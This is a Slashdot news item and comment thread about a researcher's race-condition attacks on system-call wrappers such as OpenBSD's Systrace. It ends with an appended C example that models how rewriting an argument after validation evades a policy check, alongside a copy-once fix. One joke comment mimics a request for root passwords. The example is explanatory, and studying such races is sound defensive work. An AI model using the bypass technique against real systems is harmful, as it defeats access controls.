Cambridge Researcher Breaks OpenBSD Systrace

kdawson posted about 7 years ago | from the without-a-trace dept.

Security 194

An anonymous reader writes "University of Cambridge researcher Robert Watson has published a paper at the First USENIX Workshop On Offensive Technology in which he describes serious vulnerabilities in OpenBSD's Systrace, Sudo, Sysjail, the TIS GSWTK framework, and CerbNG. The technique is also effective against many commercially available anti-virus systems. His slides include sample exploit code that bypasses access control, virtualization, and intrusion detection in under 20 lines of C code consisting solely of memcpy() and fork(). Sysjail has now withdrawn their software, recommending against any use, and NetBSD has disabled Systrace by default in their upcoming release."


SELinux and the same ... (5, Informative)

Gopal.V (532678) | about 7 years ago | (#20169547)

James Morris has put up an analysis [livejournal.com] of the same vulnerabilities.

And pushing the system code down into lower echelons of execution (i.e. kernel), the way SELinux does it, is a valid fix.

Re:SELinux and the same ... (5, Insightful)

afidel (530433) | about 7 years ago | (#20169739)

I wonder what the performance penalty for thunking to kernel space on every such operation would be? If it was well implemented I would guess it would be minimal since you could just pass the call off to the called kernel object directly. I also wonder what if any security vulnerabilities would be exposed by moving that extra code in kernel space. I know for the TrustedBSD tools it would be minimal due to their strict code checking policies, but for other systems having this much extra code in kernel space might be a risk.

Re:SELinux and the same ... (1)

gwern (1017754) | about 7 years ago | (#20170213)

If the message-passing microkernels are any guide, thunking on every kernel call could be very expensive unless you go to great lengths (like L4) to avoid it.

Re:SELinux and the same ... (2, Informative)

Jokkey (555838) | about 7 years ago | (#20170897)

> I wonder what the performance penalty for thunking to kernel space on every such operation would be?

What's being discussed here is system call wrapping, and system calls by definition go to kernel space anyway. No extra thunk to kernel space is required.

Re:SELinux and the same ... (0, Flamebait)

DrSkwid (118965) | about 7 years ago | (#20171503)

> I know for the TrustedBSD tools it would be minimal due to their strict code checking policies

I hope that works out for them because "Secure by default" and "Unbreakable" are amusing rhetoric.

Re:SELinux and the same ... (2, Informative)

makomk (752139) | about 7 years ago | (#20170729)

Just putting the validation code in the kernel is not, by itself, sufficient - it's important that any arguments are copied from userspace exactly once. If the validation code and the actual syscall code each do their own copy from userspace, this is a potentially exploitable security issue.

Linux? (3, Insightful)

morgan_greywolf (835522) | about 7 years ago | (#20169557)

Any word if any of these vulnerabilities affect Linux or other Unixes as well?

Don't be an idiot. (-1)

Anonymous Coward | about 7 years ago | (#20169577)

Wait for 45 seconds, and your question will be answered.

MOD PARENT DOWN (-1, Troll)

Anonymous Coward | about 7 years ago | (#20170015)

Offtopic

Re:Linux? (0)

Anonymous Coward | about 7 years ago | (#20170023)

If you use systrace on Linux, yes. I can't think of any mainstream distributions that ship systrace, though, so I believe this vulnerability is a non-issue for the Linux crowd. As for other unices - I have no idea, but I doubt it. OpenBSD's sudo is vulnerable because it has a systrace monitor mode, but sudo on Linux doesn't - so it should be ok.

Re:Linux? (2, Informative)

Noryungi (70322) | about 7 years ago | (#20170123)

Yes, M. Watson also attacked equivalent programs (GSWTK) under Linux successfully.

Read his blog post, as some of the techniques described are quite interesting. Too bad we can't read the full paper.

Re:Linux? (4, Informative)

x_MeRLiN_x (935994) | about 7 years ago | (#20170321)

Would you be talking about this [watson.org] ?

Re:Linux? (0)

Noryungi (70322) | about 7 years ago | (#20171689)

Correct. I only found the link after surfing to his web site.

The beauty of open source (0, Redundant)

xgr3gx (1068984) | about 7 years ago | (#20169569)

Someone will (hopefully) fix the vulnerability, and BSD will end up being better for it.

The beauty of fanboys (0)

Anonymous Coward | about 7 years ago | (#20169955)

Mmmm.... fanboys.

I want to lick them all over.

Re:The beauty of open source (0)

Anonymous Coward | about 7 years ago | (#20171225)

I thought the beauty of open source was that the code was constantly reviewed by a million eyes so that bugs like this would either never occur or would be discovered quickly (rather than years after the fact). I guess that was complete bullshit.

Apposite (0, Offtopic)

frisket (149522) | about 7 years ago | (#20169579)

Offensive Technology

Microsoft Windows?

Re:Apposite (0)

Anonymous Coward | about 7 years ago | (#20169799)

apposite [reference.com]

Since NetBSD seems to be affected as well... (1)

bomanbot (980297) | about 7 years ago | (#20169613)

are other UNIX-based Operating Systems vulnerable as well? Systrace and especially Sudo are very common in nearly all UNIX-like Systems, so maybe Linux and MacOS X users should also be concerned? And what about Windows, since commercially available anti-virus systems are also afflicted? That seems like a very serious vulnerability to me...

I'm not worried (2, Funny)

Gazzonyx (982402) | about 7 years ago | (#20169715)

I'm not worried about a vuln. in sudo; I always log in as root and don't have sudo running :). Remember, Real Programmers log in as root. Take that h4x0rz!

Re:I'm not worried (5, Funny)

eno2001 (527078) | about 7 years ago | (#20169997)

You know the old saying... "you get what you stay for". As long as you're logging in as root you will damage your system. It's a known fact. Anyone who logs in as root eventually dostoyevsky's their system. Logging in as root is dangerous. Even using 'su -' is dangerous. 'sudo' provides some level of security and accountability but even that is dangerous. I can't tell you how many times I've seen people type 'sudo bash' and then tool around doing everything as root all the time. The only way to really be safe is to never use any super user abilities whatsoever. The way I've handled it is that any time I run into something that I need root access for, I just give up. So I don't have any new users other than the ones I originally set up when I installed Ubuntu. I also don't have any access to the CD-RW drive built into the system, but that's OK since I'm not an illegal music and software pirate (only pirates use CD-R/CD-RW). I can't use the attached scanner that once worked in Windows 98 but that's OK since there is no need to scan photos or anything in Linux since there are no apps with which to work on them anyway. Whenever the system pops up asking me for the root password I just cancel out and stick with whatever settings the system had. Basically for me, a request for the root password is a threat to the security of my PC, myself and possibly the nation or even global security. So in short DO NOT EVER USE root access of ANY kind. It's very dangerous and best left to the experts (bearded and bald scientists in dusty university halls).

Re:I'm not worried (0)

Anonymous Coward | about 7 years ago | (#20170445)

I bet you were modded troll just because of that lame ass saying.

Next time try: "With great power comes great responsibility." -Spider-Man

Re:I'm not worried (1)

DrSkwid (118965) | about 7 years ago | (#20171557)

The successor to Unix [bell-labs.com] got rid of root altogether from the OS.

I prefer a boast like "Nothing to escalate" than "Secure by default"

Re:Since NetBSD seems to be affected as well... (1)

makomk (752139) | about 7 years ago | (#20170631)

Only an experimental feature in a prerelease version of sudo is affected by this vulnerability; normal users of sudo have nothing to worry about.

Re:Since NetBSD seems to be affected as well... (2, Informative)

ratboy666 (104074) | about 7 years ago | (#20171121)

Given that the vulnerability exploited is a system call race, it may be that the "unwrapped" system calls may be exploited as well.

Basically, wrapping the call (supposed to increase security) makes the race more exploitable. It is NOT "sudo" that is at fault, specifically, because sudo (in its current release) does not do call wrapping.

There is an easy solution available -- simply disallow all execution between the time the system call is invoked, and all parameters have been copied to system space. Alternatively, do not allow threading, and mapping of memory used for parameters in an active call (a bit more difficult).

A security audited system call interface is needed, along with a prohibition on wrapping system calls expected by an application (because those wraps could be exploited by an attacking program).

And you are right -- Windows is probably more vulnerable to this, simply because there are more system calls that use buffer pointers.

But this entire class of exploit is "local only", which means that the system needs to be compromised another way first; this can be used to obtain root, or use unauthorized resources.

SELinux can be used to prevent much of the damage possible, as can Trusted Solaris. I don't know if there is a Windows equivalent.

so much for... (0, Flamebait)

Fyre2012 (762907) | about 7 years ago | (#20169677)

...Only two remote holes in the default install, in more than 10 years!

It's unfortunate too tho, considering that OpenBSD is heralded as one of the most secure *nix's around. Looks like it's patch time for many.

Re:so much for... (1)

NeoTerra (986979) | about 7 years ago | (#20169745)

I'm scared when something complex has no patches. Then again I'm more scared when something complex has a LOT of patches.

Re:so much for... (5, Funny)

MrNaz (730548) | about 7 years ago | (#20169805)

Why didn't you just say "I'm scared." ?

Re:so much for... (1)

orclevegam (940336) | about 7 years ago | (#20169963)

Because sometimes I guess the patch level is "just right"?

no (0, Troll)

rubycodez (864176) | about 7 years ago | (#20169797)

these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.

Re:no (2, Insightful)

Anonymous Coward | about 7 years ago | (#20170189)

What if you can get a user shell by using an exploit in (firefox|x-chat|bind|apache|ftp|ssh|sendmail|ntp|whatever open port)?
Guess you get what you deserve when you put a machine on the internet.

Sure it is only an unprivileged local user, what could you do with that.

Oh, wait. You could get root if you had a local user using an other exploit.

Re:no (5, Funny)

Steve Baker (3504) | about 7 years ago | (#20170315)

Exactly, why would anyone want to put a computer on the internet? That's just stupid!

Re:no (1)

Hatta (162192) | about 7 years ago | (#20170357)

Why? Isn't that what multiuser networked operating systems are for?

Re:no (1)

rubycodez (864176) | about 7 years ago | (#20171655)

actually, no, if you're providing services for untrusted users. the user authenticates to and uses a service, but never to machine account to possibly run code on the machine. Local users ALWAYS can mess up a machine, there's no end to the ways they can do it.

Re:no (0)

Anonymous Coward | about 7 years ago | (#20170365)

And a poorly written server side script has never given base level access to the underlying machine to remote users?

Re:no (2)

shadowmas (697397) | about 7 years ago | (#20171137)

> these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.

Unless of course they did it because they live in the real world and actually have a practical requirement needing that to be done.

While we're disabling any form of shell access for any reason whatsoever, why not stop all those HTTP servers as well and the SMTP, DNS and all that crap as well. After all anybody who dares expose such a system on the internet when history tells us that there will be new vulnerabilities found in those software is obviously an idiot.

Re:no (1)

rubycodez (864176) | about 7 years ago | (#20171737)

If someone has need for a local account on a machine or any ability to run arbitrary code you're in the same realm as company hiring employee and trying to verify if they are trustworthy or not. Local user can always cause problems if they so choose. Just like anyone with physical access can cause even more problems.

Re:so much for... (4, Informative)

ArwynH (883499) | about 7 years ago | (#20169827)

And it still only has had two remote holes in the default install in more than 10 years. This isn't a remotely exploitable hole, it allows privilege escalation, which requires access to the system and thus is a local hole. It's still a whopper of a hole though...

Re:so much for... (0)

Anonymous Coward | about 7 years ago | (#20170177)

This idea that only holes in the default install count is kind of silly. If there's a remote hole in the FTP server then it certainly is an issue for people who want to run the FTP server.

Re:so much for... (3, Insightful)

teknopurge (199509) | about 7 years ago | (#20170415)

Then choose a better FTP server - it's not OpenBSD's fault you installed pr00tme-ftpd.

I can also publish a root password for my servers on digg. Does that mean it's OpenBSD's fault for that 'exploit' as well?

The purpose of the default install is a configuration that has been audited by _the_ most anal development team on the planet. This is nothing but a good thing, and if people have a problem with Theo's attitude, feel free to fork the codebase.

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

Re:so much for... (5, Funny)

EvanED (569694) | about 7 years ago | (#20171341)

> On my list of the 10 best OSS projects, OpenBSD is in the top 5.

In other words... it's in your list of the 5 best OSS projects.

(sorry)

Re:so much for... (2)

DrSkwid (118965) | about 7 years ago | (#20171605)

OpenBSD auditing isn't the god of all auditing you think it is.

This is just another piece of audited code that roots you.

Re:so much for... (1)

Hatta (162192) | about 7 years ago | (#20171687)

It's a marketing slogan, of course it's silly. "Only two remote holes in the default install, in more than 10 years!" means about as much as "99 44/100 percent pure."

What should individual users do (0)

Anonymous Coward | about 7 years ago | (#20169705)

The article says that vendors have been given 6 months - several years notice. Does anyone know what OpenBSD has done, or what individuals who use OpenBSD should do in light of this article? Specific instructions please!

Re:What should individual users do (1)

bberens (965711) | about 7 years ago | (#20171813)

The workaround is very complex. Send your IP and root password to pwnd@dodgeit.com and I'll take a look at your system to help make recommendations.

No need for alarm! (5, Funny)

Antarius (542615) | about 7 years ago | (#20169731)

The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

Re:No need for alarm! (5, Funny)

nateb (59324) | about 7 years ago | (#20169791)

> The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

All twelve of them. :)

I like the thought of openbsd, though, having never used it. I'm sure everything will be fine.

Re:No need for alarm! (1)

Dan Ost (415913) | about 7 years ago | (#20170081)

OpenBSD is my favorite platform for purpose-built machines. I do appreciate the security, but the main reason I like it is for the quality documentation (especially the man pages!) and the ease of setup.

The majority of my machines run Gentoo, but Gentoo can't really be used as a fire-and-forget platform like OBSD can be.

Re:No need for alarm! (5, Funny)

peacefinder (469349) | about 7 years ago | (#20170401)

> All twelve of them. :)

We yell really loud.

(And I actually yelled "Wow!". We're not a homogenous lot.)

Re:No need for alarm! (1)

MysteriousPreacher (702266) | about 7 years ago | (#20170853)

That's 13 now, I just picked up the disks a little while ago.

OpenBSD will never have the popularity or wide range of ports that FreeBSD has but it's a pretty solid system designed with a clear mandate. It's worth installing, even just to see the security decisions that have been taken so you can apply them to another Unix-like system. Like Dan Ost said, the documentation is excellent and the developers and mailing list users have been pretty helpful. The only thing I'm missing is WPA support.

Re:No need for alarm! (0)

Anonymous Coward | about 7 years ago | (#20170005)

Both of them?

Re:No need for alarm! (1)

Antarius (542615) | about 7 years ago | (#20170363)

They have big voices?

"Pay no attention to the Pufferfish behind the curtain"

And the most popular response to the halving of the OpenBSD userbase for humorous reasons:

"It's a sign that OpenBSD is a Mature O.S. So mature that the userbase has gone through puberty!"


[Whaddya mean "youdongeddit?" Puberty. You know; when a boy's balls drop. The voice gets lower... Aw, forget it.]

Re:No need for alarm! (0, Redundant)

guruevi (827432) | about 7 years ago | (#20170361)

I didn't know they could BOTH shout that loud.

why give much of a crap (2, Informative)

rubycodez (864176) | about 7 years ago | (#20169859)

on local user/software exploits? my domains have over a thousand users, but no one logs into an account on the machine.

Re:why give much of a crap (1)

xaxa (988988) | about 7 years ago | (#20170105)

I have SSH access to some machines I have webspace on (with Fasthosts, I think). I think they use GNU/Linux, but presumably there are people offering the same service but with BSD.

Re:why give much of a crap (4, Insightful)

Alioth (221270) | about 7 years ago | (#20170107)

Local exploits are only a phpBB vulnerability from being a remote exploit. If you're running a hosting service, and you're not treating local vulnerabilities as seriously as remote ones, it's only a matter of time before your machine is pwned and becomes a spam zombie. I've seen it happen.

If you allow scripting on your server, then you've essentially given your users shell access, anyway.

Re:why give much of a crap (1)

teknopurge (199509) | about 7 years ago | (#20171191)

very untrue.

php, for example, has a disable_functions parameter that prevents scripts from doing things they should not be doing.

I feel for the hosting companies that you have been with that do not audit their boxes.

Regards,

Re:why give much of a crap (1)

DrSkwid (118965) | about 7 years ago | (#20171641)

If you sleep at night on the strength of PHP's codebase then you should make sure your phone is turned off to save you being woken by the "we've been rooted" call.

Re:why give much of a crap (1)

rubycodez (864176) | about 7 years ago | (#20171599)

bullshit, crap code by incompetent programmers causes input data to be executed, the scripting languages all have ways to flag data as tainted suspect and deal with it properly with no possibility of execution (e.g. sql injection attacks, etc.) Piss poor development practices will always lead to security breaches, and that goes for any language not just the scripting ones. The biggest and most damaging attacks have been due to sloppiness in the c/c++ realm (ooo, who would ever give us more data than we expected, etc.)

Re:why give much of a crap (1)

edunbar93 (141167) | about 7 years ago | (#20170299)

Oh, that's easy. Because when an attacker breaks into someone's CMS (because your users most certainly do not read about security updates on software mailing lists, and there's no way in hell you even know what they're running), suddenly that attacker *does* have a login on that machine. They can now run software as the "httpd" user. This is the reason jail(8) was invented. And what do you know... they found a vulnerability in a certain version of jail.

OpenBSD Security (4, Funny)

pathological liar (659969) | about 7 years ago | (#20169865)

... now if only this would lead to a little ego deflation and humility among OpenBSD developers.

As long as I'm dreaming, I also want a pony.

Re:OpenBSD Security (1)

teknopurge (199509) | about 7 years ago | (#20170319)

Parish that thought.

Because of their egos, a fix is likely being committed to CVS as we speak.

Re:OpenBSD Security (3, Funny)

frenchbedroom (936100) | about 7 years ago | (#20171587)

> Parish that thought.

You mean like, put it in a convent [wikipedia.org] or something ? Oh no, I get it, you mean he should build a little chapel in memory of it, right ?

No released version of sudo affected (5, Informative)

millert (10803) | about 7 years ago | (#20169887)

The sudo systrace support is part of an experimental feature ("monitor mode") not present in any of the real sudo releases (though the code is available via anonymous cvs). Given the deficiencies of systrace (and ptrace) it is unlikely that this feature will be present in any future sudo release.

  - todd

Re:No released version of sudo affected (1)

fimbulvetr (598306) | about 7 years ago | (#20169961)

Hello Todd.

Thanks for sudo, and thanks for this clarification.

Re:No released version of sudo affected (0)

Anonymous Coward | about 7 years ago | (#20169969)

Someone upmod this guy, he's the developer of sudo.

Re:No released version of sudo affected (0)

Anonymous Coward | about 7 years ago | (#20170473)

hi todd, remember me? ./sudo

good times that.

Code isn't up (thank goodness) (1)

xC0000005 (715810) | about 7 years ago | (#20169927)

It appears he's removed the code from the presentation (though it still says it's present, I don't see it). Good.

Re:Code isn't up (thank goodness) (0)

Anonymous Coward | about 7 years ago | (#20170465)

you're not too brillant, are you ?

Thanks God.

Ha Ha (4, Funny)

UnknowingFool (672806) | about 7 years ago | (#20169931)

Sweet justice! My Win98 boxes have finally protected me against a hole. I am invinci*^&#%
$#%#^&&!#$@$

[CONNNECTION LOST]

MOD PARENT DOWN!! (0, Offtopic)

Anonymous Coward | about 7 years ago | (#20170217)

This is frickin' stupid. Nice try at ripping off the CARRIER LOST template, but you should at least copy and paste it if you don't understand where it came from.

Brace for impact... (5, Funny)

Mattintosh (758112) | about 7 years ago | (#20169941)

Theo DeRaadt goes on a rampage in 5... 4... 3... 2...

Re:Brace for impact... (1, Interesting)

Anonymous Coward | about 7 years ago | (#20170093)

De Raadt doesn't do Rampages, he only does games available via console, like Tetris, Hunt and Hangman.

He also doesn't get upset about problems being found in software, like any sane person, he's more afraid of the problems he's not finding out about.

Re:Brace for impact... (0)

Anonymous Coward | about 7 years ago | (#20171413)

> He also doesn't get upset about problems being found in software

Michael Buesch would beg to differ.

> like any sane person, he's more afraid of the problems he's not finding out about.

Two problems with this: you're making the assumption that Theo is sane, and that being upset about one thing precludes the possibility of being upset about something else.

Re:Brace for impact... (1, Informative)

Anonymous Coward | about 7 years ago | (#20171847)

Michael Buesch is a sodding douche who jumped the gun and instead of actually talking to people started screaming bloody murder, and Theo was not upset about the problem in the code so much as Michael Buesch being said douche. Read the threads, it's almost entirely based on Theo saying, "you didn't have to be a fucking asshole about it."

Re:Brace for impact... (1)

arehnius (1071476) | about 7 years ago | (#20170241)

Correct me if I'm wrong, but Robert Watson is a kind of security guru for FreeBSD, isn't he ? From his page :

> Robert Watson (FreeBSD Home Page) : I'm a FreeBSD Core Team member, as well as member of the security officer and release engineering teams.

I hope nobody will take it as a plot of FreeBSD to gain/keep lead over other BSDs.

Re:Brace for impact... (1)

mulvane (692631) | about 7 years ago | (#20171411)

The BSD's work pretty closely together and if he did find something in another BSD, it could be very possible he was looking into a feature to port over and doing his own testing of the code before hand found this. Is this what happened? I am not sure, but it is possible. The BSD's are really in a non-compete status with each other and are more in a sharing of knowledge of the forks of the original base.

fix schedules ? (0)

Anonymous Coward | about 7 years ago | (#20169965)

anyone know how or when these things are supposed to be fixed ?

as usual I would assume *bsd to put out fixes quite timely...

Re:fix schedules ? (3, Informative)

orclevegam (940336) | about 7 years ago | (#20170053)

> as usual I would assume *bsd to put out fixes quite timely...

Well, the fix for now appears to be don't use the vulnerable software, but considering that the vulnerability allows you to break the software such that it behaves as if it wasn't running, I have to wonder if people should use it anyway and just accept that for now anyone that knows how can bypass that particular security check. Also, if it was something simple like a buffer overrun that would be trivial to patch, but because of the way this particular vulnerability functions (concurrency attack) there's no simple solution. Some have suggested pushing the code to kernel space, but as they've also pointed out, that's rather risky in its own regard. Short of some kind of provision in the kernel to prevent the attacks I'm not sure how this could be fixed (although I haven't seen too many details, just that it involves re-writing some args after they've already been scanned by systrace).

Re:fix schedules ? (3, Informative)

TubeSteak (669689) | about 7 years ago | (#20170645)

> as usual I would assume *bsd to put out fixes quite timely...

FTFA: All affected vendors received at least six months, and in some cases many years advance notice regarding these vulnerabilities.

"cambridge researcher"... (3, Informative)

diegocgteleline.es (653730) | about 7 years ago | (#20170025)

...and he's also one of the most important FreeBSD hackers.

Re:"cambridge researcher"... (1, Flamebait)

chrisgagne (605844) | about 7 years ago | (#20171337)

He's probably one of the *only* FreeBSD hackers.

Why??? (0)

PookieToo (941358) | about 7 years ago | (#20170101)

Why is everyone so hell bent on BREAKING things? Can't we all just try to get along for an instant?

Re:Why??? (4, Interesting)

orclevegam (940336) | about 7 years ago | (#20170169)

> Why is everyone so hell bent on BREAKING things? Can't we all just try to get along for an instant?

Because the fastest way to learn about something is to break it. Why do you think physicists spend all that time and money on particle accelerators?

Re:Why??? (1)

ettlz (639203) | about 7 years ago | (#20170469)

Clarification:

> Why do you think physicists spend all that time and other people's money on particle accelerators?

;) (Well, I'm a theorist, so make of it what you will...)

So they can break someone *else's*! (0)

Anonymous Coward | about 7 years ago | (#20171007)

Article? (1)

Leafheart (1120885) | about 7 years ago | (#20170157)

Site is slashdotted, anyone got a copy of the article?

Re:Article? (1, Interesting)

Anonymous Coward | about 7 years ago | (#20170295)

By the way, what has happened to the slashdot effect? Not so long ago the first thing I did when reading about something on slashdot was finding a coral or google cache link to the actual article on the comments section. Nowadays - and I haven't really even thought about it - the articles usually just work. Are the webservers better now, or has the power of slashdot effect declined?

Or have I just been lucky?

Re:Article? (1, Funny)

Anonymous Coward | about 7 years ago | (#20170339)

> Are the webservers better now, or has the power of slashdot effect declined? Or have I just been lucky?

Yes.

Re:Article? (3, Funny)

jjrockman (802957) | about 7 years ago | (#20170739)

Nah, it's just that nobody RTFA anymore.

Re:Article? (1)

RockoTDF (1042780) | about 7 years ago | (#20171349)

No, the power of the digg effect has gone up.

problem affects a variety of software (1, Informative)

Anonymous Coward | about 7 years ago | (#20170405)

This class of problem potentially affects a variety of software. Systrace (which runs on Linux, NetBSD, OpenBSD, Darwin, etc) was given as one example of software that is affected. Even Sun's Dtrace might be vulnerable.

Well (-1, Flamebait)

Anonymous Coward | about 7 years ago | (#20170451)

It is official; Netcraft now confirms: *BSD is dying

One more crippling bombshell hit the already beleaguered *BSD community when IDC confirmed that *BSD market share has dropped yet again, now down to less than a fraction of 1 percent of all servers. Coming close on the heels of a recent Netcraft survey which plainly states that *BSD has lost more market share, this news serves to reinforce what we've known all along. *BSD is collapsing in complete disarray, as fittingly exemplified by failing dead last in the recent Sys Admin comprehensive networking test.

You don't need to be a Kreskin to predict *BSD's future. The hand writing is on the wall: *BSD faces a bleak future. In fact there won't be any future at all for *BSD because *BSD is dying. Things are looking very bad for *BSD. As many of us are already aware, *BSD continues to lose market share. Red ink flows like a river of blood.

FreeBSD is the most endangered of them all, having lost 93% of its core developers. The sudden and unpleasant departures of long time FreeBSD developers Jordan Hubbard and Mike Smith only serve to underscore the point more clearly. There can no longer be any doubt: FreeBSD is dying.

Let's keep to the facts and look at the numbers.

OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the *BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts.

Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house.

All major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS dilettante dabblers. *BSD continues to decay. Nothing short of a cockeyed miracle could save *BSD from its fate at this point in time. For all practical purposes, *BSD is dead.

Fact: *BSD is dying

Re:Well (0)

Anonymous Coward | about 7 years ago | (#20170533)

In other news, no one but middle managers cares what Netcraft has to say about OS usage.

This is exactly why I love OpenBSD! (4, Insightful)

amper (33785) | about 7 years ago | (#20170611)

The very fact that the OpenBSD project makes itself such a huge target for would-be hackers is what makes it almost certain that any vulnerabilities will be found and patched. No handwringing is necessary here, though quite a lot of recoding may be involved. We can all look forward to an even more secure OpenBSD very soon. Keep up the good work, everyone!

Re:This is exactly why I love OpenBSD! (1)

DrSkwid (118965) | about 7 years ago | (#20171679)

Nah, OS X exploits are where the kudos is at. You don't get death threats from Theo

OF - Hey, I know what supposed to be behind this.. (0)

Anonymous Coward | about 7 years ago | (#20170895)

I know what supposed to be behind this roof!

It's a view of my City!

I'm not kidding, picture taken from http://en.wikipedia.org/wiki/Chillon [wikipedia.org] looking at my City http://en.wikipedia.org/wiki/Montreux [wikipedia.org]

It's freakin' Swiss Day on slashdot or what ? next article is going to be about a red cross on a white flag... oh wait

USENIX Workshop On Offensive Technology (1)

Moniker42 (1131485) | about 7 years ago | (#20170963)

USENIX Workshop On Offensive Technology spells umm... woot?

*checks the date*

well, it's not April 1st ;)

Am I missing something? (0, Redundant)

Ancient_Hacker (751168) | about 7 years ago | (#20171663)

Am I missing something?

Isn't it well known that you should not validate some data that the user might still be able to modify? That's security 101.

What's the problem with copying parameters to some memory space that the user can't reach, like the system heap? Surely moving a few bytes isn't going to be a big performance hit, compared to the time it takes to validate parameters.

OpenBSD's man page for systrace mentions this? (5, Informative)

cgdae (996476) | about 7 years ago | (#20171903)

OpenBSD's systrace manpage appears to mention this problem in the BUGS section:

Applications that use clone()-like system calls to share the complete address space between processes may be able to replace system call arguments after they have been evaluated by systrace and escape policy enforcement.

Or see http://www.openbsd.org/cgi-bin/man.cgi?query=systrace&apropos=0&sektion=0&manpath=OpenBSD+Current&arch=i386&format=html [openbsd.org]
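
The race in the BUGS text quoted above, and the copy-once rule that makomk and Ancient_Hacker describe earlier in the thread, as an added example that is not part of the original discussion or of any project's code. It is a single-threaded model: the `racer_fn` callback stands in for a second thread sharing the address space, and the policy, paths and function names are all constructed for illustration.

```c
/* Added example: deterministic model of the check/use race in a syscall
 * wrapper. All names, the policy and the paths are constructed. */
#include <stdio.h>
#include <string.h>

#define ARG_MAX_LEN 64

/* Stands in for another thread or process sharing the caller's address
 * space; invoked at the point where the scheduler could run it. */
typedef void (*racer_fn)(char *user_buf);

static char last_opened[ARG_MAX_LEN];   /* what the "syscall" acted on */

/* Hypothetical policy: only files under /tmp/, no parent traversal. */
static int policy_allows(const char *path)
{
    return strncmp(path, "/tmp/", 5) == 0 && strstr(path, "..") == NULL;
}

/* Stand-in for the real system call body. */
static int do_open(const char *path)
{
    snprintf(last_opened, sizeof last_opened, "%s", path);
    return 0;
}

/* Copy a string out of caller-controlled memory, reading each byte once.
 * The terminator test looks at the private copy, never at the source
 * again. Returns -1 if no NUL is found within dstlen bytes. */
static int copyin_str(char *dst, const volatile char *user_src, size_t dstlen)
{
    for (size_t i = 0; i < dstlen; i++) {
        dst[i] = user_src[i];
        if (dst[i] == '\0')
            return 0;
    }
    dst[dstlen - 1] = '\0';
    return -1;
}

/* Wrapper as criticised in the thread: the policy check and the call
 * each read the argument from memory the caller can still write. */
static int wrapped_open_double_fetch(char *user_path, racer_fn racer)
{
    if (!policy_allows(user_path))      /* fetch 1: validation */
        return -1;
    if (racer)
        racer(user_path);               /* window between check and use */
    return do_open(user_path);          /* fetch 2: the actual operation */
}

/* Copy-once wrapper: one fetch into private storage, then both the
 * check and the operation use that copy. */
static int wrapped_open_copy_once(char *user_path, racer_fn racer)
{
    char kpath[ARG_MAX_LEN];

    if (copyin_str(kpath, user_path, sizeof kpath) != 0)
        return -1;                      /* unterminated or too long */
    if (!policy_allows(kpath))
        return -1;
    if (racer)
        racer(user_path);               /* same window, no effect on kpath */
    return do_open(kpath);
}

/* Constructed racer: rewrites the argument after it has been checked. */
static void swap_path(char *user_buf)
{
    strcpy(user_buf, "/private/data");
}

/* Each demo returns the path the operation was finally applied to. */
static const char *demo_double_fetch(void)
{
    char user[ARG_MAX_LEN] = "/tmp/report.txt";
    last_opened[0] = '\0';
    wrapped_open_double_fetch(user, swap_path);
    return last_opened;
}

static const char *demo_copy_once(void)
{
    char user[ARG_MAX_LEN] = "/tmp/report.txt";
    last_opened[0] = '\0';
    wrapped_open_copy_once(user, swap_path);
    return last_opened;
}

int main(void)
{
    printf("double fetch acted on: %s\n", demo_double_fetch());
    printf("copy once acted on:    %s\n", demo_copy_once());
    return 0;
}
```

The copy only helps when the code that performs the operation consumes the same private copy that was validated, which is the point made in the thread about doing the check inside the kernel's own argument handling.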
